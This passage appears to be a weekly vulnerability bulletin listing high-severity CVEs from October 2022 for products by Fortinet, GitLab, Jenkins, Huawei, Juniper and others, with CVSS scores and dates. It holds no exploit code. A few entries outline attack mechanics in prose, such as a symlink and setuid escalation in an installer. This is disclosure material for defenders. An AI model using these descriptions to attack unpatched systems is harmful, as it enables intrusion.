fortinet — fortitester	An improper neutralization of special elements used in an OS Command (‘OS Command Injection’) vulnerabilities [CWE-78] in Console login components of FortiTester 2.3.0 through 3.9.1, 4.0.0 through 4.2.0, 7.0.0 through 7.1.0 may allow an unauthenticated attacker to execute arbitrary command in the underlying shell.	2022-10-18	9.8	CVE-2022-33873 CONFIRM
fortinet — fortitester	An improper neutralization of special elements used in an OS Command (‘OS Command Injection’) vulnerabilities [CWE-78] in SSH login components of FortiTester 2.3.0 through 3.9.1, 4.0.0 through 4.2.0, 7.0.0 through 7.1.0 may allow an unauthenticated remote attacker to execute arbitrary command in the underlying shell.	2022-10-18	9.8	CVE-2022-33874 CONFIRM
fortinet — fortitester	An improper restriction of excessive authentication attempts vulnerability [CWE-307] in FortiTester Telnet port 2.3.0 through 3.9.1, 4.0.0 through 4.2.0, 7.0.0 through 7.1.0 may allow an unauthenticated attacker to guess the credentials of an admin user via a brute force attack.	2022-10-18	9.8	CVE-2022-35846 CONFIRM
fortinet — fortitester	An improper neutralization of special elements used in an OS command vulnerability [CWE-78] in the management interface of FortiTester 2.3.0 through 3.9.1, 4.0.0 through 4.2.0, 7.0.0 through 7.1.0 may allow an authenticated attacker to execute unauthorized commands via specifically crafted arguments to commands of the certificate import feature.	2022-10-18	7.2	CVE-2022-35844 CONFIRM
fujielectric — d300win	Fuji Electric D300win prior to version 3.7.1.17 is vulnerable to a write-what-where condition, which could allow an attacker to overwrite program memory to manipulate the flow of information.	2022-10-19	9.1	CVE-2022-1523 CONFIRM
fujielectric — d300win	Fuji Electric D300win prior to version 3.7.1.17 is vulnerable to an out-of-bounds read, which could allow an attacker to leak sensitive data from the process memory.	2022-10-19	7.5	CVE-2022-1738 CONFIRM
get-simple — getsimple_cms	GetSimple CMS v3.3.16 was discovered to contain a remote code execution (RCE) vulnerability via the edited_file parameter in admin/theme-edit.php.	2022-10-18	9.8	CVE-2022-41544 MISC
gin-vue-admin_project — gin-vue-admin	In “Gin-Vue-Admin”, versions v2.5.1 through v2.5.3b are vulnerable to Unrestricted File Upload that leads to execution of javascript code, through the “Compress Upload” functionality to the Media Library. When an admin user views the uploaded file, a low privilege attacker will get access to the admin’s cookie leading to account takeover.	2022-10-17	8	CVE-2022-32176 MISC MISC
git-scm — git	Git is an open source, scalable, distributed revision control system. `git shell` is a restricted login shell that can be used to implement Git’s push/pull functionality via SSH. In versions prior to 2.30.6, 2.31.5, 2.32.4, 2.33.5, 2.34.5, 2.35.5, 2.36.3, and 2.37.4, the function that splits the command arguments into an array improperly uses an `int` to represent the number of entries in the array, allowing a malicious actor to intentionally overflow the return value, leading to arbitrary heap writes. Because the resulting array is then passed to `execv()`, it is possible to leverage this attack to gain remote code execution on a victim machine. Note that a victim must first allow access to `git shell` as a login shell in order to be vulnerable to this attack. This problem is patched in versions 2.30.6, 2.31.5, 2.32.4, 2.33.5, 2.34.5, 2.35.5, 2.36.3, and 2.37.4 and users are advised to upgrade to the latest version. Disabling `git shell` access via remote logins is a viable short-term workaround.	2022-10-19	8.8	CVE-2022-39260 CONFIRM
gitea — gitea	Gitea before 1.17.3 does not sanitize and escape refs in the git backend. Arguments to git commands are mishandled.	2022-10-16	9.8	CVE-2022-42968 MISC MISC
github — enterprise_server	A deserialization of untrusted data vulnerability was identified in GitHub Enterprise Server that could potentially lead to remote code execution on the SVNBridge. To exploit this vulnerability, an attacker would need to gain access via a server-side request forgery (SSRF) that would let an attacker control the data being deserialized. This vulnerability affected all versions of GitHub Enterprise Server prior to v3.6 and was fixed in versions 3.5.3, 3.4.6, 3.3.11, and 3.2.16. This vulnerability was reported via the GitHub Bug Bounty program.	2022-10-19	8.8	CVE-2022-23734 CONFIRM CONFIRM CONFIRM CONFIRM
gitlab — gitlab	A vulnerability in GitLab CE/EE affecting all versions from 11.3.4 prior to 15.1.5, 15.2 to 15.2.3, 15.3 to 15.3 to 15.3.1 allows an an authenticated user to achieve remote code execution via the Import from GitHub API endpoint	2022-10-17	9.9	CVE-2022-2884 MISC CONFIRM MISC
gitlab — gitlab	A vulnerability in GitLab CE/EE affecting all versions from 11.10 prior to 15.1.6, 15.2 to 15.2.4, 15.3 to 15.3.2 allows an authenticated user to achieve remote code execution via the Import from GitHub API endpoint.	2022-10-17	8.8	CVE-2022-2992 CONFIRM MISC MISC
gitlab — gitlab	An issue in Incident Timelines has been discovered in GitLab CE/EE affecting all versions starting from 14.9 before 15.1.6, all versions starting from 15.2 before 15.2.4, all versions starting from 15.3 before 15.3.2.which allowed an authenticated attacker to inject arbitrary content. A victim interacting with this content could lead to arbitrary requests.	2022-10-17	8	CVE-2022-2527 CONFIRM MISC MISC
gitlab — gitlab	A potential DOS vulnerability was discovered in GitLab CE/EE affecting all versions before 15.1.6, all versions starting from 15.2 before 15.2.4, all versions starting from 15.3 before 15.3.2. Malformed content added to the issue description could have been used to trigger high CPU usage.	2022-10-17	7.5	CVE-2022-2931 MISC CONFIRM MISC
gitlab — gitlab	An issue has been discovered in GitLab CE/EE affecting all versions before 15.1.6, all versions starting from 15.2 before 15.2.4, all versions starting from 15.3 before 15.3.2. It may be possible for an attacker to guess a user’s password by brute force by sending crafted requests to a specific endpoint, even if the victim user has 2FA enabled on their account.	2022-10-17	7.5	CVE-2022-3031 CONFIRM MISC
gitlab — gitlab	A potential DOS vulnerability was discovered in GitLab CE/EE affecting all versions before before 15.2.5, all versions starting from 15.3 before 15.3.4, all versions starting from 15.4 before 15.4.1 While cloning an issue with special crafted content added to the description could have been used to trigger high CPU usage.	2022-10-17	7.5	CVE-2022-3283 MISC CONFIRM MISC
gitlab — gitlab	A potential DOS vulnerability was discovered in GitLab CE/EE affecting all versions from 10.8 before 15.1.6, all versions starting from 15.2 before 15.2.4, all versions starting from 15.3 before 15.3.2. Improper data handling on branch creation could have been used to trigger high CPU usage.	2022-10-21	7.5	CVE-2022-3639 MISC CONFIRM
gitlab — gitlab	An issue has been discovered in GitLab affecting all versions starting from 12.10 before 15.1.6, all versions starting from 15.2 before 15.2.4, all versions starting from 15.3 before 15.3.2. GitLab was not performing correct authentication with some Package Registries when IP address restrictions were configured, allowing an attacker already in possession of a valid Deploy Token to misuse it from any location.	2022-10-17	7.4	CVE-2022-2533 MISC CONFIRM
gitlab — gitlab	A crafted tag in the Jupyter Notebook viewer in GitLab EE/CE affecting all versions before 15.1.6, 15.2 to 15.2.4, and 15.3 to 15.3.2 allows an attacker to issue arbitrary HTTP requests	2022-10-17	7.3	CVE-2022-2428 CONFIRM MISC MISC
gitlab — gitlab	Improper control of a resource identifier in Error Tracking in GitLab CE/EE affecting all versions from 12.7 allows an authenticated attacker to generate content which could cause a victim to make unintended arbitrary requests	2022-10-17	7.3	CVE-2022-3060 MISC MISC CONFIRM
go-admin — go-admin	go-admin (aka GO Admin) 2.0.12 uses the string go-admin as a production JWT key.	2022-10-17	9.8	CVE-2022-42980 MISC
golang — go	Reader.Read does not set a limit on the maximum size of file headers. A maliciously crafted archive could cause Read to allocate unbounded amounts of memory, potentially causing resource exhaustion or panics. After fix, Reader.Read limits the maximum size of header blocks to 1 MiB.	2022-10-14	7.5	CVE-2022-2879 MISC MISC MISC MISC FEDORA
golang — go	Requests forwarded by ReverseProxy include the raw query parameters from the inbound request, including unparseable parameters rejected by net/http. This could permit query parameter smuggling when a Go proxy forwards a parameter with an unparseable value. After fix, ReverseProxy sanitizes the query parameters in the forwarded query when the outbound request’s Form field is set after the ReverseProxy. Director function returns, indicating that the proxy has parsed the query parameters. Proxies which do not parse query parameters continue to forward the original query parameters unchanged.	2022-10-14	7.5	CVE-2022-2880 MISC MISC MISC MISC FEDORA
golang — go	Programs which compile regular expressions from untrusted sources may be vulnerable to memory exhaustion or denial of service. The parsed regexp representation is linear in the size of the input, but in some cases the constant factor can be as high as 40,000, making relatively small regexps consume much larger amounts of memory. After fix, each regexp being parsed is limited to a 256 MB memory footprint. Regular expressions whose representation would use more space than that are rejected. Normal use of regular expressions is unaffected.	2022-10-14	7.5	CVE-2022-41715 MISC MISC MISC MISC FEDORA
golang — text	An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.	2022-10-14	7.5	CVE-2022-32149 MISC MISC MISC MISC
google — android	In music service, there is a missing permission check. This could lead to elevation of privilege in contacts service with no additional execution privileges needed.	2022-10-14	7.8	CVE-2022-2985 MISC
google — android	In soundrecorder service, there is a missing permission check. This could lead to elevation of privilege in contacts service with no additional execution privileges needed.	2022-10-14	7.8	CVE-2022-38669 MISC
google — android	In soundrecorder service, there is a missing permission check. This could lead to elevation of privilege in contacts service with no additional execution privileges needed.	2022-10-14	7.8	CVE-2022-38670 MISC
google — android	In messaging service, there is a missing permission check. This could lead to elevation of privilege in contacts service with no additional execution privileges needed.	2022-10-14	7.8	CVE-2022-38698 MISC
google — android	In messaging service, there is a missing permission check. This could lead to elevation of privilege in contacts service with no additional execution privileges needed.	2022-10-14	7.8	CVE-2022-39080 MISC
google — android	In Soundrecorder service, there is a missing permission check. This could lead to elevation of privilege in Soundrecorder service with no additional execution privileges needed.	2022-10-14	7.8	CVE-2022-39107 MISC
google — android	In Music service, there is a missing permission check. This could lead to elevation of privilege in Music service with no additional execution privileges needed.	2022-10-14	7.8	CVE-2022-39108 MISC
google — android	In Music service, there is a missing permission check. This could lead to elevation of privilege in Music service with no additional execution privileges needed.	2022-10-14	7.8	CVE-2022-39109 MISC
google — android	In Music service, there is a missing permission check. This could lead to elevation of privilege in Music service with no additional execution privileges needed.	2022-10-14	7.8	CVE-2022-39110 MISC
google — android	In Music service, there is a missing permission check. This could lead to elevation of privilege in Music service with no additional execution privileges needed.	2022-10-14	7.8	CVE-2022-39111 MISC
google — drive	An attacker can pre-create the `/Applications/Google Drive.app/Contents/MacOS` directory which is expected to be owned by root to be owned by a non-root user. When the Drive for Desktop installer is run for the first time, it will place a binary in that directory with execute permissions and set its setuid bit. Since the attacker owns the directory, the attacker can replace the binary with a symlink, causing the installer to set the setuid bit on the symlink. When the symlink is executed, it will run with root permissions. We recommend upgrading past version 64.0	2022-10-17	7.3	CVE-2022-3421 MISC
gpac — gpac	GPAC 2.1-DEV-rev368-gfd054169b-master was discovered to contain a heap buffer overflow via the function gf_isom_box_dump_start_ex at /isomedia/box_funcs.c.	2022-10-19	7.8	CVE-2022-43040 MISC
gpac — gpac	GPAC 2.1-DEV-rev368-gfd054169b-master was discovered to contain a heap buffer overflow via the function FixSDTPInTRAF at isomedia/isom_intern.c.	2022-10-19	7.8	CVE-2022-43042 MISC
gradle — enterprise	A credential-exposure vulnerability in the support-bundle mechanism in Gradle Enterprise 2022.3 through 2022.3.3 allows remote attackers to access a subset of application data (e.g., cleartext credentials). This is fixed in 2022.3.3.	2022-10-21	7.5	CVE-2022-41575 MISC MISC
gxgroup — gpon_ont_titanium_2122a_firmware	An issue in GX Group GPON ONT Titanium 2122A T2122-V1.26EXL allows attackers to escalate privileges via a brute force attack at the login page.	2022-10-17	9.8	CVE-2022-40055 MISC MISC MISC
hiwin — robot_system_software	HIWIN Robot System Software version 3.3.21.9869 does not properly address the terminated command source. As a result, an attacker could craft code to disconnect HRSS and the controller and cause a denial-of-service condition.	2022-10-17	7.5	CVE-2022-3382 MISC
huawei — harmonyos	The HwAirlink module has a heap overflow vulnerability in processing data packets of the proprietary protocol.Successful exploitation of this vulnerability may allow attackers to obtain process control permissions.	2022-10-14	9.8	CVE-2022-38980 MISC
huawei — harmonyos	The fingerprint module has service logic errors.Successful exploitation of this vulnerability will cause the phone lock to be cracked.	2022-10-14	9.8	CVE-2022-38982 MISC
huawei — harmonyos	The BT Hfp Client module has a Use-After-Free (UAF) vulnerability.Successful exploitation of this vulnerability may result in arbitrary code execution.	2022-10-14	9.8	CVE-2022-38983 MISC MISC
huawei — harmonyos	The MPTCP module has an out-of-bounds write vulnerability.Successful exploitation of this vulnerability may cause root privilege escalation attacks implemented by modifying program information.	2022-10-14	9.8	CVE-2022-41578 MISC MISC
huawei — harmonyos	The HW_KEYMASTER module has a vulnerability of not verifying the data read.Successful exploitation of this vulnerability may cause malicious construction of data, which results in out-of-bounds access.	2022-10-14	9.8	CVE-2022-41580 MISC MISC
huawei — harmonyos	The HW_KEYMASTER module has a vulnerability of missing bounds check on length.Successful exploitation of this vulnerability may cause malicious construction of data, which results in out-of-bounds access.	2022-10-14	9.1	CVE-2021-46839 MISC MISC
huawei — harmonyos	The HW_KEYMASTER module has an out-of-bounds access vulnerability in parameter set verification.Successful exploitation of this vulnerability may cause malicious construction of data, which results in out-of-bounds access.	2022-10-14	9.1	CVE-2021-46840 MISC MISC
huawei — harmonyos	The HIPP module has a vulnerability of bypassing the check of the data transferred in the kernel space.Successful exploitation of this vulnerability may cause out-of-bounds access to the HIPP module and page table tampering, affecting device confidentiality and availability.	2022-10-14	9.1	CVE-2022-38986 MISC MISC
huawei — harmonyos	The HW_KEYMASTER module has a vulnerability of not verifying the data read.Successful exploitation of this vulnerability may cause malicious construction of data, which results in out-of-bounds access.	2022-10-14	9.1	CVE-2022-41581 MISC MISC
huawei — harmonyos	The kernel module has an out-of-bounds read vulnerability.Successful exploitation of this vulnerability may cause memory overwriting.	2022-10-14	7.8	CVE-2022-41584 MISC MISC
huawei — harmonyos	The kernel module has an out-of-bounds read vulnerability.Successful exploitation of this vulnerability may cause memory overwriting.	2022-10-14	7.8	CVE-2022-41585 MISC MISC
huawei — harmonyos	The HwAirlink module has a heap overflow vulnerability.Successful exploitation of this vulnerability may cause out-of-bounds writes, resulting in modification of sensitive data.	2022-10-14	7.5	CVE-2022-38977 MISC
huawei — harmonyos	The HwAirlink module has an out-of-bounds read vulnerability.Successful exploitation of this vulnerability may cause information leakage.	2022-10-14	7.5	CVE-2022-38981 MISC
huawei — harmonyos	The HIPP module has a vulnerability of not verifying the data transferred in the kernel space.Successful exploitation of this vulnerability will cause out-of-bounds read, which affects data confidentiality.	2022-10-14	7.5	CVE-2022-38984 MISC MISC
huawei — harmonyos	The facial recognition module has a vulnerability in input validation.Successful exploitation of this vulnerability may affect data confidentiality.	2022-10-14	7.5	CVE-2022-38985 MISC MISC
huawei — harmonyos	The HISP module has a vulnerability of not verifying the data transferred in the kernel space.Successful exploitation of this vulnerability will cause out-of-bounds read, which affects data confidentiality.	2022-10-14	7.5	CVE-2022-38998 MISC MISC
huawei — harmonyos	The HISP module has a vulnerability of bypassing the check of the data transferred in the kernel space.Successful exploitation of this vulnerability may cause unauthorized access to the HISP module.	2022-10-14	7.5	CVE-2022-39011 MISC MISC
huawei — harmonyos	The security module has configuration defects.Successful exploitation of this vulnerability may affect system availability.	2022-10-14	7.5	CVE-2022-41582 MISC MISC
huawei — harmonyos	The storage maintenance and debugging module has an array out-of-bounds read vulnerability.Successful exploitation of this vulnerability will cause incorrect statistics of this module.	2022-10-14	7.5	CVE-2022-41583 MISC MISC
huawei — harmonyos	The communication framework module has a vulnerability of not truncating data properly.Successful exploitation of this vulnerability may affect data confidentiality.	2022-10-14	7.5	CVE-2022-41586 MISC MISC
huawei — harmonyos	The home screen module has a vulnerability in service logic processing.Successful exploitation of this vulnerability may affect data integrity.	2022-10-14	7.5	CVE-2022-41588 MISC MISC
huawei — harmonyos	The DFX unwind stack module of the ArkCompiler has a vulnerability in interface calling.Successful exploitation of this vulnerability affects system services and device availability.	2022-10-14	7.5	CVE-2022-41589 MISC MISC
ikea — tradfri_led1732g11_firmware	An attacker sending a single malformed IEEE 802.15.4 (Zigbee) frame makes the TRÅDFRI bulb blink, and if they replay (i.e. resend) the same frame multiple times, the bulb performs a factory reset. This causes the bulb to lose configuration information about the Zigbee network and current brightness level. After this attack, all lights are on with full brightness, and a user cannot control the bulbs with either the IKEA Home Smart app or the TRÅDFRI remote control. The malformed Zigbee frame is an unauthenticated broadcast message, which means all vulnerable devices within radio range are affected. CVSS 3.1 Base Score 7.1 vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H	2022-10-14	8.1	CVE-2022-39064 MISC
ikus-soft — rdiffweb	Missing Authentication for Critical Function in GitHub repository ikus060/rdiffweb prior to 2.5.0a6.	2022-10-20	9.8	CVE-2022-3327 MISC CONFIRM
iptime — nas1dual_firmware	This vulnerability occurs in user accounts creation and deleteion related pages of IPTIME NAS products. The vulnerability could be exploited by a lack of validation when a POST request is made to this page. An attacker can use this vulnerability to or delete user accounts, or to escalate arbitrary user privileges.	2022-10-17	8.8	CVE-2022-23771 MISC
jasper_project — jasper	A vulnerability found in jasper. This security vulnerability happens because of a memory leak bug in function cmdopts_parse that can cause a crash or segmentation fault.	2022-10-14	7.5	CVE-2022-2963 MISC MISC MISC
jenkins — compuware_topaz_for_total_test	Jenkins Compuware Topaz for Total Test Plugin 2.4.8 and earlier implements an agent/controller message that does not limit where it can be executed, allowing attackers able to control agent processes to read arbitrary files on the Jenkins controller file system.	2022-10-19	7.5	CVE-2022-43429 CONFIRM MLIST
jenkins — compuware_topaz_for_total_test	Jenkins Compuware Topaz for Total Test Plugin 2.4.8 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.	2022-10-19	7.5	CVE-2022-43430 CONFIRM MLIST
jenkins — groovy	A sandbox bypass vulnerability involving various casts performed implicitly by the Groovy language runtime in Jenkins Pipeline: Groovy Plugin 2802.v5ea_628154b_c2 and earlier allows attackers with permission to define and run sandboxed scripts, including Pipelines, to bypass the sandbox protection and execute arbitrary code in the context of the Jenkins controller JVM.	2022-10-19	9.9	CVE-2022-43402 CONFIRM MLIST
jenkins — groovy_libraries	A sandbox bypass vulnerability in Jenkins Pipeline: Groovy Libraries Plugin 612.v84da_9c54906d and earlier allows attackers with permission to define untrusted Pipeline libraries and to define and run sandboxed scripts, including Pipelines, to bypass the sandbox protection and execute arbitrary code in the context of the Jenkins controller JVM.	2022-10-19	9.9	CVE-2022-43405 CONFIRM MLIST
jenkins — input_step	Jenkins Pipeline: Input Step Plugin 451.vf1a_a_4f405289 and earlier does not restrict or sanitize the optionally specified ID of the ‘input’ step, which is used for the URLs that process user interactions for the given ‘input’ step (proceed or abort) and is not correctly encoded, allowing attackers able to configure Pipelines to have Jenkins build URLs from ‘input’ step IDs that would bypass the CSRF protection of any target URL in Jenkins when the ‘input’ step is interacted with.	2022-10-19	8.8	CVE-2022-43407 CONFIRM MLIST
jenkins — katalon	Jenkins Katalon Plugin 1.0.32 and earlier implements an agent/controller message that does not limit where it can be executed and allows invoking Katalon with configurable arguments, allowing attackers able to control agent processes to invoke Katalon on the Jenkins controller with attacker-controlled version, install location, and arguments, and attackers additionally able to create files on the Jenkins controller (e.g., attackers with Item/Configure permission could archive artifacts) to invoke arbitrary OS commands.	2022-10-19	8.8	CVE-2022-43416 CONFIRM MLIST
jenkins — mercurial	Jenkins Mercurial Plugin 1251.va_b_121f184902 and earlier provides information about which jobs were triggered or scheduled for polling through its webhook endpoint, including jobs the user has no permission to access.	2022-10-19	7.5	CVE-2022-43410 CONFIRM MLIST
jenkins — repo	Jenkins REPO Plugin 1.15.0 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.	2022-10-19	7.5	CVE-2022-43415 CONFIRM MLIST
jenkins — script_security	A sandbox bypass vulnerability involving casting an array-like value to an array type in Jenkins Script Security Plugin 1183.v774b_0b_0a_a_451 and earlier allows attackers with permission to define and run sandboxed scripts, including Pipelines, to bypass the sandbox protection and execute arbitrary code in the context of the Jenkins controller JVM.	2022-10-19	9.9	CVE-2022-43403 CONFIRM MLIST
jenkins — script_security	A sandbox bypass vulnerability involving crafted constructor bodies and calls to sandbox-generated synthetic constructors in Jenkins Script Security Plugin 1183.v774b_0b_0a_a_451 and earlier allows attackers with permission to define and run sandboxed scripts, including Pipelines, to bypass the sandbox protection and execute arbitrary code in the context of the Jenkins controller JVM.	2022-10-19	9.9	CVE-2022-43404 CONFIRM MLIST
jenkins — script_security	A sandbox bypass vulnerability involving various casts performed implicitly by the Groovy language runtime in Jenkins Script Security Plugin 1183.v774b_0b_0a_a_451 and earlier allows attackers with permission to define and run sandboxed scripts, including Pipelines, to bypass the sandbox protection and execute arbitrary code in the context of the Jenkins controller JVM.	2022-10-19	8.8	CVE-2022-43401 CONFIRM MLIST
jhead_project — jhead	Jhead 3.06.0.1 allows attackers to execute arbitrary OS commands by placing them in a JPEG filename and then using the regeneration -rgt50 option.	2022-10-17	7.8	CVE-2022-41751 MISC MISC MISC
jsonlint_project — jsonlint	jsonlint 1.0 is vulnerable to heap-buffer-overflow via /home/hjsz/jsonlint/src/lexer.	2022-10-19	7.5	CVE-2022-42227 MISC
juniper — junos	An Improper Input Validation vulnerability in the J-Web component of Juniper Networks Junos OS may allow an unauthenticated attacker to access data without proper authorization. Utilizing a crafted POST request, deserialization may occur which could lead to unauthorized local file access or the ability to execute arbitrary commands. This issue affects Juniper Networks Junos OS: all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R2-S7, 19.4R3-S9; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S2; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R2-S2, 21.3R3; 21.4 versions prior to 21.4R1-S2, 21.4R2-S1, 21.4R3; 22.1 versions prior to 22.1R1-S1, 22.1R2.	2022-10-18	9.8	CVE-2022-22241 CONFIRM
juniper — junos	A PHP Local File Inclusion (LFI) vulnerability in the J-Web component of Juniper Networks Junos OS may allow a low-privileged authenticated attacker to execute an untrusted PHP file. By chaining this vulnerability with other unspecified vulnerabilities, and by circumventing existing attack requirements, successful exploitation could lead to a complete system compromise. This issue affects Juniper Networks Junos OS: all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S6; 19.4 versions prior to 19.4R2-S7, 19.4R3-S8; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S2; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R2-S2, 21.3R3; 21.4 versions prior to 21.4R1-S2, 21.4R2-S1, 21.4R3; 22.1 versions prior to 22.1R1-S1, 22.1R2.	2022-10-18	8.8	CVE-2022-22246 CONFIRM
juniper — junos	On cSRX Series devices software permission issues in the container filesystem and stored files combined with storing passwords in a recoverable format in Juniper Networks Junos OS allows a local, low-privileged attacker to elevate their permissions to take control of any instance of a cSRX software deployment. This issue affects Juniper Networks Junos OS 20.2 version 20.2R1 and later versions prior to 21.2R1 on cSRX Series.	2022-10-18	7.8	CVE-2022-22251 CONFIRM
juniper — junos	An Improper Validation of Specified Index, Position, or Offset in Input vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS allows an unauthenticated network-based attacker to cause a Denial of Service (DoS). On SRX5000 Series with SPC3, SRX4000 Series, and vSRX, when PowerMode IPsec is configured and a malformed ESP packet matching an established IPsec tunnel is received the PFE crashes. This issue affects Juniper Networks Junos OS on SRX5000 Series with SPC3, SRX4000 Series, and vSRX: All versions prior to 19.4R2-S6, 19.4R3-S7; 20.1 versions prior to 20.1R3-S3; 20.2 versions prior to 20.2R3-S4; 20.3 versions prior to 20.3R3-S3; 20.4 versions prior to 20.4R3-S2; 21.1 versions prior to 21.1R3; 21.2 versions prior to 21.2R3; 21.3 versions prior to 21.3R1-S2, 21.3R2.	2022-10-18	7.5	CVE-2022-22201 CONFIRM
juniper — junos	On SRX Series devices, an Improper Check for Unusual or Exceptional Conditions when using Certificate Management Protocol Version 2 (CMPv2) auto re-enrollment, allows a network-based, unauthenticated attacker to cause a Denial of Service (DoS) by crashing the pkid process. The pkid process cannot handle an unexpected response from the Certificate Authority (CA) server, leading to crash. A restart is required to restore services. This issue affects: Juniper Networks Junos OS on SRX Series: All versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R3-S9; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S4; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S1; 21.2 versions prior to 21.2R3; 21.3 versions prior to 21.3R2; 21.4 versions prior to 21.4R2.	2022-10-18	7.5	CVE-2022-22218 CONFIRM
juniper — junos	On QFX10000 Series devices using Juniper Networks Junos OS when configured as transit IP/MPLS penultimate hop popping (PHP) nodes with link aggregation group (LAG) interfaces, an Improper Validation of Specified Index, Position, or Offset in Input weakness allows an attacker sending certain IP packets to cause multiple interfaces in the LAG to detach causing a Denial of Service (DoS) condition. Continued receipt and processing of these packets will sustain the Denial of Service. This issue affects IPv4 and IPv6 packets. Packets of either type can cause and sustain the DoS event. These packets can be destined to the device or be transit packets. On devices such as the QFX10008 with line cards, line cards can be restarted to restore service. On devices such as the QFX10002 you can restart the PFE service, or reboot device to restore service. This issue affects: Juniper Networks Junos OS on QFX10000 Series: All versions prior to 15.1R7-S11; 18.4 versions prior to 18.4R2-S10, 18.4R3-S10; 19.1 versions prior to 19.1R3-S8; 19.2 versions prior to 19.2R3-S4; 19.3 versions prior to 19.3R3-S5; 19.4 versions prior to 19.4R2-S6, 19.4R3-S7; 20.1 versions prior to 20.1R3-S3; 20.2 versions prior to 20.2R3-S3; 20.3 versions prior to 20.3R3-S2; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3; 21.2 versions prior to 21.2R3-S3; 21.3 versions prior to 21.3R3-S1. An indicator of compromise may be seen by issuing the command: request pfe execute target fpc0 command “show jspec pechip[3] registers ps l2_node 10” timeout 0 \| refresh 1 \| no-more and reviewing for backpressured output; for example: GOT: 0x220702a8 pe.ps.l2_node[10].pkt_cnt 00000076 GOT: 0x220702b4 pe.ps.l2_node[10].backpressured 00000002 <<<< STICKS HERE and requesting detail on the pepic wanio: request pfe execute target fpc0 command “show pepic 0 wanio-info” timeout 0 \| no-more \| match xe-0/0/0:2 GOT: 3 xe-0/0/0:2 10 6 3 0 1 10 189 10 0x6321b088 <<< LOOK HERE as well as looking for tail drops looking at the interface queue, for example: show interfaces queue xe-0/0/0:2 resulting in: Transmitted: Total-dropped packets: 1094137 0 pps << LOOK HERE	2022-10-18	7.5	CVE-2022-22223 CONFIRM
juniper — junos	An Improper Validation of Specified Type of Input vulnerability in the routing protocol daemon (rpd) of Juniper Networks Junos OS allows an attacker to cause an RPD memory leak leading to a Denial of Service (DoS). This memory leak only occurs when the attacker’s packets are destined to any configured IPv6 address on the device. This issue affects: Juniper Networks Junos OS 21.1 versions prior to 21.1R3-S2; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R3; 21.4 versions prior to 21.4R2; 22.1 versions prior to 22.1R2. This issue does not affect Juniper Networks Junos OS versions prior to 21.1R1.	2022-10-18	7.5	CVE-2022-22228 CONFIRM
juniper — junos	An Unchecked Return Value to NULL Pointer Dereference vulnerability in Packet Forwarding Engine (PFE) of Juniper Networks Junos OS allows an unauthenticated, network-based attacker to cause a Denial of Service (DoS). On SRX Series if Unified Threat Management (UTM) Enhanced Content Filtering (CF) and AntiVirus (AV) are enabled together and the system processes specific valid transit traffic the Packet Forwarding Engine (PFE) will crash and restart. This issue affects Juniper Networks Junos OS 21.4 versions prior to 21.4R1-S2, 21.4R2 on SRX Series. This issue does not affect Juniper Networks Junos OS versions prior to 21.4R1.	2022-10-18	7.5	CVE-2022-22231 CONFIRM
juniper — junos	A NULL Pointer Dereference vulnerability in the Packet Forwarding Engine of Juniper Networks Junos OS on SRX Series allows an unauthenticated, network-based attacker to cause a Denial of Service (DoS). On SRX Series If Unified Threat Management (UTM) Enhanced Content Filtering (CF) is enabled and specific transit traffic is processed the PFE will crash and restart. This issue affects Juniper Networks Junos OS: 21.4 versions prior to 21.4R1-S2, 21.4R2 on SRX Series; 22.1 versions prior to 22.1R1-S1, 22.1R2 on SRX Series. This issue does not affect Juniper Networks Junos OS versions prior to 21.4R1.	2022-10-18	7.5	CVE-2022-22232 CONFIRM
juniper — junos	An Improper Check for Unusual or Exceptional Conditions vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS on SRX Series allows an unauthenticated, network-based, attacker to cause Denial of Service (DoS). A PFE crash will happen when a GPRS Tunnel Protocol (GTP) packet is received with a malformed field in the IP header of GTP encapsulated General Packet Radio Services (GPRS) traffic. The packet needs to match existing state which is outside the attackers control, so the issue cannot be directly exploited. The issue will only be observed when endpoint address validation is enabled. This issue affects Juniper Networks Junos OS on SRX Series: 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S4; 20.4 versions prior to 20.4R3-S3; 21.1 versions prior to 21.1R3-S2; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R3; 21.4 versions prior to 21.4R1-S2, 21.4R2; 22.1 versions prior to 22.1R1-S1, 22.1R2. This issue does not affect Juniper Networks Junos OS versions prior to 20.2R1.	2022-10-18	7.5	CVE-2022-22235 CONFIRM
